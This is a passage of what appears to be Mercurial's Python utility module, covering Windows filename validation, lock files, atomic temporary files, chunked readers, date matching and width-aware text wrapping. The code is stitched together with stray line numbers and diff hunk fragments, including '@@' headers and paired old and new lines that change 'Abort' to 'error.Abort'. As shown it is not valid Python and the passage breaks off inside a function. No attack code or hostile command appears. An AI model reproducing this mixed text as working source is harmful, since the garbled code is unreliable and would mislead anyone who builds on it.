    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        # skip empty components produced by '//' or a trailing '/'
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        # a trailing dot or space is rejected; the substring test
        # 'n not in ".."' exempts the special components '.' and '..'
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
1691
# pick the platform-appropriate filename checker and timer
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

# prefer time.perf_counter where available (Python 3.3+)
if safehasattr(time, "perf_counter"):
    timer = time.perf_counter
1701
def makelock(info, pathname):
    """Create a lock at ``pathname`` holding ``info``.

    A symlink whose target is ``info`` is preferred; when symlinks are
    unsupported (or creation fails for a reason other than the lock
    already existing), a regular file containing ``info`` is created
    exclusively instead.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        # an existing lock is an error; anything else falls through to
        # the regular-file strategy below
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    fd = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(fd, info)
    os.close(fd)
1714
def readlock(pathname):
    """Return the info stored in the lock at ``pathname``.

    Reads the symlink target when the lock is a symlink, otherwise the
    contents of the regular lock file.
    """
    try:
        return os.readlink(pathname)
    except OSError as why:
        # EINVAL/ENOSYS: not a symlink (or no symlink support) -- fall
        # through to reading a regular file
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    contents = fp.read()
    fp.close()
    return contents
1727
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        # object has no fileno(): fall back to stat'ing it by name
        return os.stat(fp.name)
1734
1735 # File system features
1736
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    st1 = os.lstat(path)
    dirname, base = os.path.split(path)
    folded = base.upper()
    if folded == base:
        folded = base.lower()
    if folded == base:
        return True # no evidence against case sensitivity
    # stat the case-flipped sibling: if it resolves to the same entry,
    # the filesystem folds case
    try:
        st2 = os.lstat(os.path.join(dirname, folded))
        if st2 == st1:
            return False
        return True
    except OSError:
        return True
1759
# try the optional third-party re2 engine; _re2 is a tri-state flag:
# None = present but untested, False = unavailable (see _re._checkre2)
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False
1765
class _re(object):
    """Facade selecting between the optional re2 engine and stdlib re."""

    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes flags inline rather than as an argument
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern not supported by re2: fall back to stdlib re
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape
1808
1809 re = _re()
1810
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map normalized names to on-disk spellings for one directory
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # NOTE: str.replace returns a new string; the previous code discarded
    # the result, leaving '\' unescaped inside the character class below.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separator runs are passed through verbatim
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1853
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        # derive the link name from the temp name so both live in the
        # same directory (and thus the same filesystem)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        # link creation or stat failed: assume nlink is unreliable here
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
1882
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    # only consult the alternate separator on platforms that have one
    return pycompat.osaltsep and path.endswith(pycompat.osaltsep)
1887
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    # deliberately a thin wrapper: callers rely on plain str.split semantics
    return path.split(pycompat.ossep)
1895
def gui():
    '''Are we running in a GUI?'''
    if pycompat.isdarwin:
        if 'SSH_CONNECTION' in encoding.environ:
            # handle SSH access to a box where the user is logged in
            return False
        elif getattr(osutil, 'isgui', None):
            # check if a CoreGraphics session is available
            return osutil.isgui()
        else:
            # pure build; use a safe default
            return True
    else:
        # elsewhere, Windows or a display variable implies a GUI
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
1910
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # source doesn't exist: an empty temp file is the copy
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # clean up the partial copy before propagating any failure
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
1951
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        # stat: os.stat_result for an existing file, or None
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        # alternate constructor: stat a path, mapping ENOENT to stat=None
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        # alternate constructor from an open file object
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat.st_ctime == old.stat.st_ctime and
                    self.stat.st_mtime == old.stat.st_mtime)
        except AttributeError:
            pass
        try:
            # AttributeError above means at least one side has stat None;
            # two missing files compare equal
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat.st_ctime == old.stat.st_ctime)
        except AttributeError:
            # either side has stat None: cannot be ambiguous
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # advance mtime by one second, wrapping to stay a positive 32-bit
        # value
        advanced = (old.stat.st_mtime + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        # Python 2 does not derive __ne__ from __eq__
        return not self == other
2053
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name      # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        # flush writes and atomically move the temp file into place
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        # drop all writes: delete the temp copy without touching the target
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit, discard if an exception escaped the block
        if exctype is not None:
            self.discard()
        else:
            self.close()
2116
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # prune any parent directories the removal may have left empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
2128
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as err:
        if err.errno == errno.ENOENT:
            # already gone: that's the desired end state
            return
        raise
2136
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        # a parent is missing: create it recursively, then retry
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        # applied only to the leaf; parents keep the mode makedir gave them
        os.chmod(name, mode)
2164
def readfile(path):
    """Return the entire binary contents of path."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
2168
def writefile(path, text):
    """Overwrite path with the binary string text."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
2172
def appendfile(path, text):
    """Append the binary string text to path, creating it if missing."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
2176
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # split chunks over 1MB into 256KB pieces so a small read()
            # never has to hold a huge chunk in the queue
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        # offset of the first unread byte inside self._queue[0]
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)
2256
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # nbytes == 0 short-circuits: the limit has been exhausted
        s = nbytes and f.read(nbytes)
        if not s:
            return
        if limit:
            limit -= len(s)
        yield s
2277
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        remaining = self._left
        if not remaining:
            # budget exhausted (or zero to begin with): synthetic EOF
            return b''

        if n < 0:
            n = remaining

        data = self._fh.read(min(n, remaining))
        self._left = remaining - len(data)
        assert self._left >= 0

        return data
2306
2307 63 def makedate(timestamp=None):
2308 64 '''Return a unix timestamp (or the current time) as a (unixtime,
2309 65 offset) tuple based off the local timezone.'''
@@ -2311,7 +67,7 b' def makedate(timestamp=None):'
2311 67 timestamp = time.time()
2312 68 if timestamp < 0:
2313 69 hint = _("check your clock")
2314 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
70 raise error.Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2315 71 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2316 72 datetime.datetime.fromtimestamp(timestamp))
2317 73 tz = delta.days * 86400 + delta.seconds
@@ -2546,24 +302,24 b' def matchdate(date):'
2546 302 date = date.strip()
2547 303
2548 304 if not date:
2549 raise Abort(_("dates cannot consist entirely of whitespace"))
305 raise error.Abort(_("dates cannot consist entirely of whitespace"))
2550 306 elif date[0] == "<":
2551 307 if not date[1:]:
2552 raise Abort(_("invalid day spec, use '<DATE'"))
308 raise error.Abort(_("invalid day spec, use '<DATE'"))
2553 309 when = upper(date[1:])
2554 310 return lambda x: x <= when
2555 311 elif date[0] == ">":
2556 312 if not date[1:]:
2557 raise Abort(_("invalid day spec, use '>DATE'"))
313 raise error.Abort(_("invalid day spec, use '>DATE'"))
2558 314 when = lower(date[1:])
2559 315 return lambda x: x >= when
2560 316 elif date[0] == "-":
2561 317 try:
2562 318 days = int(date[1:])
2563 319 except ValueError:
2564 raise Abort(_("invalid day spec: %s") % date[1:])
320 raise error.Abort(_("invalid day spec: %s") % date[1:])
2565 321 if days < 0:
2566 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
322 raise error.Abort(_("%s must be nonnegative (see 'hg help dates')")
2567 323 % date[1:])
2568 324 when = makedate()[0] - days * 3600 * 24
2569 325 return lambda x: x >= when
@@ -2574,1732 +330,3 b' def matchdate(date):'
2574 330 else:
2575 331 start, stop = lower(date), upper(date)
2576 332 return lambda x: x >= start and x <= stop
2577
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    >>> kind, pat, m = stringmatcher(b'abcdefg')
    >>> (kind, pat, bool(m(b'abcdefg')), bool(m(b'abc')))
    ('literal', 'abcdefg', True, False)
    >>> kind, pat, m = stringmatcher(b're:a.+b')
    >>> (kind, pat, bool(m(b'fooadefbar')))
    ('re', 'a.+b', True)
    >>> stringmatcher(b'literal:re:foobar')[:2]
    ('literal', 're:foobar')
    """
    if pattern.startswith('re:'):
        regexp = pattern[3:]
        flags = 0 if casesensitive else remod.I
        try:
            matcher = remod.compile(regexp, flags).search
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', regexp, matcher

    # strip an explicit 'literal:' prefix; anything else is taken verbatim
    if pattern.startswith('literal:'):
        pattern = pattern[8:]

    if casesensitive:
        match = pattern.__eq__
    else:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2636
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # drop the domain, then anything before '<', then truncate at the
    # first space or dot -- in that order, matching "First Last <a.b@c>"
    idx = user.find('@')
    if idx >= 0:
        user = user[:idx]
    idx = user.find('<')
    if idx >= 0:
        user = user[idx + 1:]
    for sep in (' ', '.'):
        idx = user.find(sep)
        if idx >= 0:
            user = user[:idx]
    return user
2652
def emailuser(user):
    """Return the user portion of an email address."""
    at = user.find('@')
    if at >= 0:
        user = user[:at]
    # strip any "Real Name <" prefix left over from a full address
    lt = user.find('<')
    if lt >= 0:
        user = user[lt + 1:]
    return user
2662
def email(author):
    '''get email of author.'''
    end = author.find('>')
    if end == -1:
        # no closing bracket: slice to the end of the string
        end = None
    start = author.find('<') + 1
    return author[start:end]
2669
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    # encoding.trim measures display columns (East-Asian width aware),
    # not bytes or characters
    return encoding.trim(text, maxlength, ellipsis='...')
2673
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        magnitude = abs(count)
        # pick the first (largest) unit whose threshold the value reaches
        for multiplier, divisor, fmt in unittable:
            if magnitude >= divisor * multiplier:
                return fmt % (count / float(divisor))
        # below every threshold: fall back to the smallest unit
        return unittable[-1][2] % count

    return go
2684
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)

    Raises ParseError when the range is empty/reversed or when fromline
    is not strictly positive.
    """
    if fromline > toline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    # convert the 1-based inclusive start to a 0-based half-open range
    return fromline - 1, toline
2705
# render a byte count with a human-readable unit; thresholds are ordered
# largest-first so at most three significant digits are printed
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2718
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    # normalize CR*LF sequences to a single LF
    return _eolre.sub('\n', s)

def tocrlf(s):
    # normalize CR*LF sequences to a single CRLF
    return _eolre.sub('\r\n', s)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    # LF platforms: both directions are identity functions
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
2736
def escapestr(s):
    """Return s with backslash escapes applied, like repr() minus quotes."""
    # call underlying function of s.encode('string_escape') directly for
    # Python 3 compatibility; it returns an (output, length) pair
    encoded, _consumed = codecs.escape_encode(s)
    return encoded
2741
def unescapestr(s):
    """Inverse of escapestr(): interpret backslash escapes in s."""
    # escape_decode returns an (output, length) pair; keep the output
    decoded, _consumed = codecs.escape_decode(s)
    return decoded
2744
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy
        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2753
def uirepr(s):
    # Avoid double backslash in Windows path repr()
    # (byterepr escapes '\' once per character; collapse the pairs back)
    return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2757
# delay import of textwrap
def MBTextWrapper(**kwargs):
    # On first call, build the width-aware TextWrapper subclass and
    # rebind this module-level name to it; later calls hit the class
    # directly.
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # split ucstr after the longest prefix fitting in
            # space_left display columns
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2861
def wrap(line, width, initindent='', hangindent=''):
    """Wrap a byte string to *width* display columns.

    initindent prefixes the first output line, hangindent the rest.
    Wrapping is done on unicode so that column widths (including wide
    East-Asian characters) are measured correctly, then re-encoded.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    line = line.decode(pycompat.sysstr(encoding.encoding),
                       pycompat.sysstr(encoding.encodingmode))
    initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2877
if (pyplatform.python_implementation() == 'CPython' and
        sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #   | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy | buggy | okay
    #    fp.read* | buggy | okay [1] | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    # emit every complete line; keep a trailing partial
                    # line in the accumulator for the next read
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        # regular files are not interruptible; only use the slow safe
